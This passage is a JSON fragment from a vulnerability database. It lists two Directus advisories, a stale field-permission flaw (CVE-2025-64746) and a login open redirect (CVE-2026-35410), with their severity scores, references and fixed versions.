Directus does not properly clean up field-level permissions when a field is deleted. When a field is removed from a collection, its reference in the permissions table remains intact. This stale reference creates a security gap: if another field is later created using the same name, it inherits the outdated permission entry. This behavior can unintentionally grant roles access to data they should not be able to read or modify. The issue is particularly risky in multi-tenant or production environments, where administrators may reuse field names, assuming old permissions have been fully cleared. Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13908","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13793","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8","reference_id":"84d7636969083387164ce5d2fd15a65e11e2d0b8","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746","reference_id":"CVE-2025-64746","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746"},{"reference_url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64746","GHSA-9x5g-62gj-wqf2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ywqb-qrvw-hfbh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71813?format=json","vulnerability_id":"VCID-z5ud-p9th-mff2","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03634","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03617","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410"},{"reference_url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"GHSA-cf45-hxwj-4cfj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"GHSA-cf45-hxwj-4cfj","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:25Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35410","GHSA-cf45-hxwj-4cfj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z5ud-p9th-mff2"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@0.1.0-preview.16"}